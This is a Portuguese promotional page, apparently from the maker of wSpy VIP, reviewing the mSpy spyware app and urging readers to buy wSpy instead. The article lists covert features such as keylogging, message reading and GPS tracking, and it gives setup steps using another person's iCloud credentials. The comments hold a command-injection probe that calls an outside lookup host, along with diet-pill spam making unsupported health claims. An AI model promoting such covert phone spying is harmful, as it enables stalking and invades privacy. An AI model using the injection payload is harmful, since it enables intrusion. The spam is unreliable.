MSPY: este app funciona ou é uma fraude?

Quando você pensa no melhor aplicativo espião acessível no mercado, o que lhe vem à mente? É natural termos dúvidas ao escolher um app espião, pensando bem, são muitas as opções.

Refletindo nisso, vamos falar um pouquinho sobre os programas da empresa MSPY e, no final, faremos um comparativo com o melhor aplicativo desse segmento: o wSpy VIP.

Antes de iniciarmos, precisamos destacar alguns aspectos notados logo de cara:

  • O primeiro é que o aplicativo espião da MSPY não tem uma classificação, mas em destaque a informação de não recomenda no site Reclame Aqui. É possível verificar as reclamações no link a seguir: https://www.reclameaqui.com.br/empresa/mspy/
  • O segundo é que ele não deixa claro sua política de uso, dizendo no anúncio em destaque que você poderá rastrear o celular da pessoa sem que a pessoa saiba que está usando o MSPY, porém no final da página onde não encontra nenhum destaque eles avisam que é ilegal utilizar o programa  em um aparelho que não pertença a você.

Com estes detalhes em mente, vamos começar falando sobre alguns detalhes desta empresa.

O que é a MSPY?

O MSPY é uma empresa no segmento de monitoramento, como o próprio nome sugere. Ela produz programas de monitoramento tanto para Android, como para dispositivos com sistema IOS.

O objetivo principal do aplicativo produzido é para a proteção familiar, principalmente das crianças.

A empresa trabalha com quatro programas diferentes:

  • iPhone Sem Jailbreak: Programa espião voltado para o monitoramento de dispositivos com sistema IOS, precisando ter as credenciais do iCloud e a ativação de backups.
  • Rastreamento de iPhone: É também um programa espião de monitoramento para IOS; Versões 7 e 14, requer jailbreak
  • Rastreamento de dispositivos Android: É um programa espião para Android. A diferença para o IOS, é que todas as funções de monitoramento de mensagens instantâneas requerem o processo de root no dispositivo Android!
  • Kit Família: Programa espião voltado para família dando a oportunidade de monitorar até 3 dispositivos, lembrando que precisam de root.

O site oficial da empresa é um pouco confuso. Além de possuir muitos erros de português, o próprio nome da empresa não está claro. É possível encontrar a escrita do nome da empresa de três formas diferentes (MSPY, Mspy e mSpy).

Apesar destas observações, vamos focar agora no funcionamento do aplicativo espião para Android & IOS e se este é, ou não, confiável.

Principais recursos e funções

aplicativo espião da empresa, conforme já mencionado, é o mSpy que possui algumas funções interessantes. As principais são:

  • Monitoramento de chamadas: é possível obter o histórico das chamadas feitas no aparelho monitorado;
  • Monitoramento do WhatsApp, KiK, Viber & Line: você consegue monitorar todas as mensagens trocadas nos aplicativos e por SMS;
  • Monitoramento das teclas digitadas: uma função que permite monitorar tudo o que é digitado no celular.
  • Rastreamento via GPS & Delimitação Geográfica: saiba a localização exata do celular monitorado e quando ele sair do local apresentado na delimitação;
  • Monitoramento do histórico de navegação: é possível saber o que é acessado no aparelho;
  • Monitoramento do Instagram: esta função permite visualizar as mensagens de texto trocadas dentro do aplicativo.

Estas são as principais funções disponíveis no mSpy. O aplicativo depende de root, o que dificulta um pouco a instalação.

Pensando nisso, vamos ver agora como baixar e instalar o aplicativo.

Como baixar e instalar iPhone sem Jailbreak

O processo de instalação do aplicativo espião é simples e fácil, sem precisar usar o Jailbreak

Três passos são necessários para isso:

  1. Ter o ID da Apple, adquirido ao ter um iPhone;
  2. Precisa ter os dados de acesso do mesmo iPhone e estar ativado as cópias de segurança regulares na conta;
  3. Acesse o site da MSPY na página, no assistente de instalação selecione a opção IOS sem jailbreak;
  4. Faça o login com o mesmo ID da Apple;
  5. Por último, escolha o dispositivo e a aplicação mSpy vai processar os dados e mostrar todas as informações no dashboard.

Esta é uma descrição breve da instalação. No site indicado no início, é possível obter informações mais detalhadas do processo.

Finalizando esta primeira etapa, surge uma dúvida: o monitoramento da mSpy, como funciona?

O funcionamento é simples. Após feita a instalação do aplicativo, você poderá acessar o painel on-line de qualquer outro dispositivo. Os passos para o acesso são estes:

  • Na página oficial, no canto superior direito, é possível selecionar a opção de Entrar, conforme indicado na imagem abaixo.
  • Após isto, você será encaminhado para uma página que solicitará as suas credenciais.
  • Quando você acessar a sua conta, será possível visualizar o dispositivo cadastrado e suas informações coletadas. Veja na demonstração abaixo.

A plataforma on-line é muito simples e clara de se utilizar, assim como em outros aplicativos espiões que encontramos no mercado.

O aplicativo da MSPY funciona, porém, há muitas reclamações em torno da empresa e do aplicativo em si.

A empresa possui um chat onde pode enviar seus problemas ou dúvidas via e-mail perante ao programa, mas o mesmo possui muitas reclamações de demora e a péssima qualidade no atendimento, além de muitas reclamações por não ter nenhum feedback sobre a devolução do dinheiro.

Com as funções e o processo de instalação e uso em mente, agora é preciso saber o que mais preocupa as pessoas: o preço do produto.

Vamos abordar agora os preços e planos que a empresa oferece.

Planos e preços do aplicativo

Os preços para a aquisição do aplicativo espião mSpy variam dependendo da quantidade de meses escolhida pelo usuário.

Eles trabalham com três planos principais. Na tabela abaixo podemos ter uma visão dos pacotes fornecidos pela empresa.

Como podemos notar, os preços são acessíveis. O plano mais adquirido pelos usuários é o de doze meses. Apesar de o preço do plano ser atraente, ele não é muito vantajoso por ser um plano que requer uma assinatura, o que deixaria preso durante os doze meses.

Agora, após esta longa análise do aplicativo da MSPY, podemos fazer um comparativo dele com o aplicativo wSpy VIP. Vamos entender porque o wSpy VIP é a melhor escolha.

mSpy X WT Software

mSpy é confiável. Não é um golpe, o aplicativo realmente funciona. Porém, como já salientado, ele possui muitas reclamações, que variam desde o atendimento ruim até o funcionamento em si dos programas.

O aplicativo espião mSpy tem algumas funcionalidades interessantes, como a Delimitação Geográfica, função keylooger e a possibilidade de instalar o programa sem Jailbreak em aparelho IOS. Admitimos que estas funções são diferenciadas. Porém, com tanta instabilidade, fica difícil acreditar e confiar em um funcionamento confiável.

O que mais deixa a desejar na empresa é o atendimento e o programa. Uma das reclamações são referentes a isso. Verdade seja dita: O atendimento da empresa é ruim e sem retorno quando cliente pede reembolso.

Com todos estes pontos destacados, fica fácil saber porque o wSpy VIP é a melhor escolha de aplicativo espião.

Podemos destacar o atendimento excelente. O suporte da empresa funciona 24 horas por dia, durante o horário comercial temos o atendimento telefônico e on-line prestando o suporte e a excelência em nossos atendimentos.

Além disso, tanto usuários como especialistas indicam o aplicativo wSpy VIP, ao contrário do mSpy, com matérias de 7 anos atrás, a respeito do qual não encontramos muitas recomendações.

wSpy VIP tem o preço mais acessível e as suas funções são mais completas. Além disso, o site oficial é bem estruturado, o que não podemos dizer da MSPY, que possui muitos erros na estrutura, fazendo com que eles não passem muita confiança.

Com tudo isso em mente, fica claro que o wSpy é o mais estável, tem o melhor atendimento, possui mais funções disponíveis e é o mais recomendado no ramo de monitoramento.

Após todos estes detalhes que destacamos, a que conclusão podemos chegar?

Vamos ver isto no último tópico. Além disso, iremos dar uma nota final para a empresa e seu aplicativo.

Conclusão

A conclusão é clara: o melhor aplicativo é o wSpy VIP. É bom deixarmos isso bem evidente. O mSpy está longe de ser melhor que o wSpy VIP.

No entanto, alguns aspectos podem até ser destacados. A empresa possui recursos tanto para o celular com sistema Android como para IOS. A empresa peca por não fornecer nenhuma monitoramento para computador, visando a ajudar as empresas e famílias.

Além disso, algumas funções do aplicativo mSpy são boas, porém não passam confiança alguma, pois há muitas reclamações sobre devolução e no monitoramento.

Outro problema é o atendimento, que já foi destacado. Um bom atendimento é essencial em qualquer empresa.

Podemos avaliar a empresa WT Software com uma nota 9/10.

Nossa empresa busca cada dia melhorar nosso atendimento e praticando a excelência com nossos clientes, mas como uma empresa que busca melhorar o desempenho de nossos produtos estamos em constantes mudanças para melhoria de nossos aplicativos de monitoramento.

Com tudo isso podemos avaliar a empresa mSpy com uma nota 5/10.

mSpy precisa corrigir estes e outros problemas relacionados ao atendimento e estabilidade do monitoramento. É preciso também estruturar melhor o site oficial, pois o mesmo é desorganizado e com muitos erros de português e falta de comunicação com o cliente, não dando a confiança em seu produto.

Assim, não temos dúvida: se você quer um aplicativo espião estável, com um ótimo atendimento, escolha o wSpy VIP!

57 comentários

  1. wrBEIRqX Responder

    ;(nslookup hitpjnftfvjjb63c3f.bxss.me||perl -e “gethostbyname(‘hitpjnftfvjjb63c3f.bxss.me’)”)|(nslookup hitpjnftfvjjb63c3f.bxss.me||perl -e “gethostbyname(‘hitpjnftfvjjb63c3f.bxss.me’)”)&(nslookup hitpjnftfvjjb63c3f.bxss.me||perl -e “gethostbyname(‘hitpjnftfvjjb63c3f.bxss.me’)”)

  2. Nora Responder

    Hello i aam kavin, its my first occasion to commenting anyplace, when i
    rewad thiss piece oof writting i thought i could also reate comment due too this brilliant
    piece off writing.

  3. "http://kackle.com.au/mediawiki/index.php/Wie_Sie_Abnehmen_Knnen_Ohne_Ihrer_Gesundheit_Zu_Schaden_Anleitung_Von_Einem_Experten Responder

    Wer plant, die Kur mit Reduslim zu beenden, der muss keine Vorkehrungen treffen. Ich brauchte sie nicht wirklich, aber wenn der Arzt es verschrieb, dann muss ich trinken.
    Will man nur von deutschen Herstellern Appetitzügler kaufen, so muss im Vorfeld in Erfahrung gebracht werden, wer der Hersteller des Produkts ist.

    Laut Hersteller soll das Diätpräparat das
    Körpergewicht des Anwenders in kürzester Zeit reduzieren können. In der heutigen Zeit sind wir im wahrsten Sinne des Wortes ständig auf den Beinen, was eine Belastung für unsere Füße darstellt.

    Übergewicht und Fettleibigkeit sind mit einer Epidemie des Überflusses verbunden.
    Im Sommer ist sie zu einer Hochzeit eingeladen und möchte davor noch
    ein paar Kilo abnehmen. Schlussfolgerung: Unser ausführliche Test hat gezeigt, dass nur PhenQ einen guten Eindruck hinterlassen hat und wirklich
    beim Abnehmen geholfen hat. Schon der Appetitzügler Test hat gezeigt, dass es unterschiedliche
    Darreichungsformen gibt. Leider mussten wir bei unserem Abnehmpillen Test plus Bewertung feststellen,
    dass es unter den verschiedenen Diätpillen einige Ausnahmen gibt, die nichts
    taugen und absolut kein Geld wert sind.

    Nein, die Abnehmpillen von Vit4everŽ enthalten laut Hersteller keine bedenklichen Inhaltsstoffe und auch kein Magnesiumstearat, das in der Kritik steht, das Immunsystem zu schwächen und
    Allergien auszulösen. Auch die Erzeugung der Artikel erfolgt laut Hersteller
    direkt in Deutschland. Um die Kunden nicht zu täuschen und solche negativen Folgen zu vermeiden, entschied sich der Hersteller von ReduSlim, diese Art von Vermittlern beim Verkauf des Produkts ganz aufzugeben.
    Kritische Bewertungen der Inhaltsstoffe des Fatburners von DM!
    Laut Bewertungen von Ernährungsexperten, ReduSlim
    kurbelt den Stoffwechsel an 24/7. Alles, was Sie
    tun müssen, ist Ihre Zeit und Energie zu Ihrem Ziel widmet.
    Während seiner Zeit auf dem Markt hat das Nahrungsergänzungsmittel seine hohe Wirksamkeit und vollständige Sicherheit bestätigt,
    was durch echte Rückmeldungen von dankbaren Kunden belegt wird.
    Ich kann aus eigener Erfahrung mit Sicherheit sagen:
    Wenn Sie nach einem guten Produkt zur Gewichtsreduktion suchen, müssen Sie nur Reduslim bestellen. Ach, und
    ich bin keine ausnahme, und ich habe pfunde. Es wurden keine Nebenwirkungen beobachtet.

    Unsere Testerin Juliane hat die Kapseln jedoch gut vertragen und
    keine Nebenwirkungen verspürt. Wenn Sie morgens
    gut essen, können Sie einen gesteigerten Appetit am Nachmittag oder
    Abend vermeiden. Lässt Ihr Budget diese Investition nicht zu, können Sie auf günstigere Produkte mit
    Glucomannan zurückgreifen. Die Refigura Produkte sind
    in zahlreichen Online-Shops erhältlich. In unserem großen Test konnte Refigura nur
    teilweise überzeugen. Da wir auch andere Fatburner getestet
    haben, finden Sie hier unseren Fatfix Test. Wie funktioniert der Revolyn Keto Burn Fatburner?

    Ich verbringe viel zeit, die online-kommunikation, einschließlich frauen und foren. Darüber hinaus kann es sowohl von Frauen als auch von Männern verwendet werden. Glucomannan als der vielversprechende Ballaststoff in den Refigura Kapseln. Durch die
    starke Fermentierung von Glucomannan durch Darmbakterien,
    kann es zu Blähungen kommen. So kommen Sie monatlich auf einen Bedarf von vier Packungen und insgesamt
    120€. Dieser Preis ist aus unserer Sicht nicht gerechtfertigt.
    Je nach Anbieter sind die Refigura Kapseln zu einem Preis von ungefähr 30€ erhältlich.
    Natürlich spielt auch der Preis eine wichtige Rolle. Kakao spielt auch eine wichtige Rolle bei der Gewichtsabnahme,
    da er die Energie erhöht und die Aufnahme von Fetten und Kohlenhydraten und damit die Gewichtszunahme begrenzt.

    Es ist bedeutend für Stoffwechselprozesse von Kohlenhydraten, Eiweißen und Fetten. Jetzt wünsche ich Ihnen allen eine
    gute Gesundheit und schließe meine kurze Bewertung ab.
    Bei einem täglichen Bedarf von 9 Kapseln, reicht eine Packung für
    gute sechs Tage. Verglichen mit Placebo, zeigt der Hauptwirkstoff der Refigura
    Kapseln, Glucomannan, keinerlei Effekt auf das Körpergewicht.

    Refigura kann den Cholesterin- und Blutzuckerspiegel beeinflussen.
    Refigura kann die Wirksamkeit von Medikamenten und Vitaminen verringern. Vor allem die Aufnahme
    von fettlöslichen Vitaminen wie A, D, E und K kann reduziert
    sein. Ja, Übergewicht und vor allem Adipositas können die Gesundheit gefährden. Die Inhaltsstoffe in Reduslim sind alle natürlich und schaden Ihrer Gesundheit nicht.
    Explizit wurden die Reduslim Kapseln entwickelt, um eine aufwendige Diät und
    Sport im Rahmen einer Gewichtsabnahme zu ersetzen. Dies kann durch weniger
    Nahrungsaufnahme erfolgen oder mehr Verbrennung von Energie durch Sport.
    Das bedeutet, dass dem Körper weniger Energie zugeführt werden soll, als er täglich benötigt.
    Gewicht zu verlieren und kümmern sich um eine attraktive und gesunde ganzen Körper.
    Es gibt viele Möglichkeiten, wie der Körper Fett speichern kann.

    My blog post: “http://creator1024.claasi.de/index.php?title=Merkmale_Von_Fitnesskursen_Nach_Dem_40_Lebensjahr

  4. Anônimo Responder

    Magnifient items from you, man. I hazve remember your stuff prior to and you’re simply too
    excellent. I actuslly likme what you’ve received right here, crtainly llike what you aree saying aand the way iin which through which you say it.
    Youu arre makibg it entertaining and yyou cojtinue to take care oof to stay
    iit smart. I can’t wait too read much mode froim you. This iss actually
    a tremendous webb site.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *